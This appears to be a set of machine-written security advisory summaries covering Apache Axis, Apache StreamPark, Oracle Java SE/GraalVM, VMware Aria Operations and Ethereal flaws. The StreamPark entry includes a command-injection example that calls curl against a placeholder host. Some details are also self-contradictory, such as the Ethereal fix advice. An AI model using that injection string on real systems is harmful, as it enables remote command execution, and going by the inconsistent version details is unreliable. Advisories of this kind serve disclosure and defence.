Bing

**Nome do software vulnerável e versões afetadas** Versões do Apache Axis até a 1.3 **Descrição** O problema está relacionado a uma vulnerabilidade de validação inadequada de entrada no Apache Axis, que permite que usuários com acesso ao serviço de administração realizem possíveis ataques de falsificação de solicitação do lado do servidor (SSRF). Isso poderia levar a um acesso não autorizado a recursos internos. O número estimado de dispositivos potencialmente afetados em todo o mundo não foi especificado. Não há informações sobre incidentes reais em que essa vulnerabilidade tenha sido explorada. **Recomendações** Como solução temporária, considere migrar para um mecanismo SOAP diferente, como o Apache Axis 2/Java. Como alternativa, use uma versão do Axis com o patch de https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 aplicado. Observe que o projeto Apache Axis não planeja lançar uma versão do Axis 1.x para corrigir este problema.

**Name of the Vulnerable Software and Affected Versions** Apache StreamPark versions prior to 2.1.4 **Description** The issue is related to incorrect handling of the `<` element in the Project Module of Apache StreamPark, allowing for remote command execution. The vulnerability can be exploited by inserting commands, such as using the `<` operator to execute arbitrary commands, for example, `< (curl http://xxx.com )`. The risk level of this vulnerability is considered low, as it requires the attacker to have system-level permissions and log in to the StreamPark system. **Recommendations** For versions prior to 2.1.4, upgrade to version 2.1.4 to resolve the issue, as the `<` operator will be blocked in this version.

**Name of the Vulnerable Software and Affected Versions** Oracle Java SE versions 8u381 through 8u381-perf Oracle GraalVM Enterprise Edition versions 20.3.11 through 21.3.7 **Description** The vulnerability in the Oracle Java SE and Oracle GraalVM Enterprise Edition product is related to the CORBA component. It allows an unauthenticated attacker with network access via CORBA to compromise the system. Successful attacks can result in unauthorized update, insert, or delete access to some of the accessible data. This vulnerability can only be exploited by supplying data to APIs in the specified component without using untrusted Java Web Start applications or untrusted Java applets, such as through a web service. **Recommendations** For Oracle Java SE versions 8u381 through 8u381-perf, consider disabling the CORBA component until a patch is available. For Oracle GraalVM Enterprise Edition versions 20.3.11 through 21.3.7, restrict access to the CORBA component to minimize the risk of exploitation. As a temporary workaround, consider restricting the use of APIs in the specified component without using untrusted Java Web Start applications or untrusted Java applets. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** VMware Aria Operations (affected versions not specified) **Description** The issue is related to a Local privilege escalation vulnerability in VMware Aria Operations. A malicious actor with administrative privileges in the Aria Operations application can gain root access to the underlying operating system. The vulnerability is also associated with insufficient access control in the virtual infrastructure monitoring tool. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** VMware Aria Operations (affected versions not specified) **Description** The issue is related to insufficient access control in the VMware Aria Operations tool, which can be exploited to execute arbitrary code and escalate privileges. A malicious actor with administrative access to the local system can escalate privileges to 'root'. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.

Name of the Vulnerable Software and Affected Versions: Ethereal versions 0.10.4 through 0.10.7 Description: The issue is related to an unknown vulnerability in the DICOM dissector, which allows remote attackers to cause a denial of service, resulting in an application crash. Recommendations: For Ethereal versions 0.10.4 through 0.10.7, consider updating to a version that contains a fix for this issue, as no specific workaround is provided for these versions. At the moment, there is no information about a newer version that contains a fix for this vulnerability.